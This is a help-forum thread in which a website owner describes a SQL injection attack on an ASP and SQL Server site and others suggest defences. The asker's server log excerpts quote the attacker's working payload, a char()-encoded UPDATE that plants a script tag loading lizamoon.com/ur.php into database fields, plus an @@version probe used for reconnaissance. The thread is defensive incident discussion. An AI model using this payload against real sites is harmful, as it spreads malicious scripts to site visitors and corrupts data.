garnett-dickinson
asked on
Recent SQL Injection Attack
Hi,
Found out recently that my website (ASP and SQL Server database) has been attacked by SQL Injection. It has inserted a script link to lizamoon.com/ur.php into database fields that are either 'text' or 'nvarchar' fields.
Searching in google reveals that a lot of other ASP and ASP.NET have been hit as well.
I have now cleared out the database.
Has anyone got any suggestions of how to make sure this does not happen again or has anyone else had this exact attack happen to them and how and what have they done to prevent this.
Thanks in advance for you most greatful help.
Found out recently that my website (ASP and SQL Server database) has been attacked by SQL Injection. It has inserted a script link to lizamoon.com/ur.php into database fields that are either 'text' or 'nvarchar' fields.
Searching in google reveals that a lot of other ASP and ASP.NET have been hit as well.
I have now cleared out the database.
Has anyone got any suggestions of how to make sure this does not happen again or has anyone else had this exact attack happen to them and how and what have they done to prevent this.
Thanks in advance for you most greatful help.
here read this :http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx
Hello
This is a very common problem being faced by webmasters which are running websites coded long back. Major issue in these websites are that code, dosnt validate input from the user before passing it to the dataservers..
Solution is to use stored procedures instead of direct SQL statements. Or else, validate inputs before passing it to your quries.. avoid keywords like ";, select, update, insert, delete" etc from the user inputs.
These are the very basis pointers to start working on it.. If you are not a programmer, you will need to hire a programmer to handle this issue for you..
Let me know if i can help any further on this issue.
This is a very common problem being faced by webmasters which are running websites coded long back. Major issue in these websites are that code, dosnt validate input from the user before passing it to the dataservers..
Solution is to use stored procedures instead of direct SQL statements. Or else, validate inputs before passing it to your quries.. avoid keywords like ";, select, update, insert, delete" etc from the user inputs.
These are the very basis pointers to start working on it.. If you are not a programmer, you will need to hire a programmer to handle this issue for you..
Let me know if i can help any further on this issue.
sounds like it is also 'cross site scripting', which you might also want to look into
ASKER CERTIFIED SOLUTION
membership
Create a free account to see this answer
Signing up is free and takes 30 seconds. No credit card required.
ASKER
I have just noticed that it has happened again, not as many fields this time. I can't alter some of the scripts that I have on the site as they are part of an off-the-shelf shopping cart package that we've purchased. However, it has also affect tables in the database that are not part of the shopping cart package.
Want is even more strange is that it is the only database that has been affected on this SQL Server, 1 out of 4 databases. I have also change FTP and admin passwords since the first attack.
This is leading me to believe that this is not SQL injection, unless some people think otherwise.
Want is even more strange is that it is the only database that has been affected on this SQL Server, 1 out of 4 databases. I have also change FTP and admin passwords since the first attack.
This is leading me to believe that this is not SQL injection, unless some people think otherwise.
ASKER
I have just noticed (just after the second attack) the difference between the SQL Server database that was hit and the ones on the same server that were not, it was the permissions of the database. I had gott 'Delete', 'Execute', 'Insert', and 'Select' ticked. I have not got them ticked in my other database and I can still add, update, etc in my webpages.
I still believe it is SQL injection..
Will you like to share the URL to look into ?
Will you like to share the URL to look into ?
ASKER
Sorry, do you mean the URL of the site that got attacked
yes.. URl of the site which is attacked so that we can look into the security loop holes in it..
Hello,
Here are 4 very useful links from the OWASP :
http://www.owasp.org/index.php/SQL_Injection
http://www.owasp.org/index.php/Guide_to_SQL_Injection
http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
http://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection
I use another strategy when programming ASP.NET applications, I use a data persistence framework such as Gentle Framework that completely protect against SQL injection, even if it is not the purpose at all of this kind of framework.
Here are 4 very useful links from the OWASP :
http://www.owasp.org/index.php/SQL_Injection
http://www.owasp.org/index.php/Guide_to_SQL_Injection
http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
http://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection
I use another strategy when programming ASP.NET applications, I use a data persistence framework such as Gentle Framework that completely protect against SQL injection, even if it is not the purpose at all of this kind of framework.
ASKER
I have looked over the logs and found out which page they have used to inject the script code:
2011-03-29 17:56:49 <<my server ip address>> GET /<<pagename>>.asp prod=MG0011'+update+tblMem bers+set+F orename=RE PLACE(cast (Forename+ as+varchar (8000)),ca st(char(60 )%2Bchar(4 7)%2Bchar( 116)%2Bcha r(105)%2Bc har(116)%2 Bchar(108) %2Bchar(10 1)%2Bchar( 62)%2Bchar (60)%2Bcha r(115)%2Bc har(99)%2B char(114)% 2Bchar(105 )%2Bchar(1 12)%2Bchar (116)%2Bch ar(32)%2Bc har(115)%2 Bchar(114) %2Bchar(99 )%2Bchar(6 1)%2Bchar( 104)%2Bcha r(116)%2Bc har(116)%2 Bchar(112) %2Bchar(58 )%2Bchar(4 7)%2Bchar( 47)%2Bchar (108)%2Bch ar(105)%2B char(122)% 2Bchar(97) %2Bchar(10 9)%2Bchar( 111)%2Bcha r(111)%2Bc har(110)%2 Bchar(46)% 2Bchar(99) %2Bchar(11 1)%2Bchar( 109)%2Bcha r(47)%2Bch ar(117)%2B char(114)% 2Bchar(46) %2Bchar(11 2)%2Bchar( 104)%2Bcha r(112)%2Bc har(62)%2B char(60)%2 Bchar(47)% 2Bchar(115 )%2Bchar(9 9)%2Bchar( 114)%2Bcha r(105)%2Bc har(112)%2 Bchar(116) %2Bchar(62 )+as+varch ar(8000)), cast(char( 32)+as+var char(8)))- - 80 - 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+W indows+NT+ 5.0;+en-US ;+rv:1.4)+ Gecko/2003 0624+Netsc ape/7.1+(a x)
I have looked further into it and found a few entries using the highlight IP address, which I suspect is to find out which page they can use:
2011-02-11 08:26:05 <<my server ip>> GET /<<my page>>.asp prod=MG0011'+or+1=@@versio n--|11|800 40e07|Conv ersion_fai led_when_c onverting_ the_nvarch ar_value_' Microsoft_ SQL_Server _2008_(RTM )_-_10.0.1 600.22_(X6 4)__+Jul__ 9_2008_14: 17:44__+Co pyright_(c )_1988-200 8_Microsof t_Corporat ion_+Web_E dition_(64 -bit)_on_W indows_NT_ 5.2_<X64>_ (Build_379 0:_Service _Pack_2)_' _to_data_t ype_int. 80 - 95.64.9.18 HTTP/1.1
I have now put in a script which removes 'bad words' such as 'SELECT', 'INSERT', 'UPDATE', etc. from the query string passed to this page.
I'd rather not share the URL thanks
2011-03-29 17:56:49 <<my server ip address>> GET /<<pagename>>.asp prod=MG0011'+update+tblMem
I have looked further into it and found a few entries using the highlight IP address, which I suspect is to find out which page they can use:
2011-02-11 08:26:05 <<my server ip>> GET /<<my page>>.asp prod=MG0011'+or+1=@@versio
I have now put in a script which removes 'bad words' such as 'SELECT', 'INSERT', 'UPDATE', etc. from the query string passed to this page.
I'd rather not share the URL thanks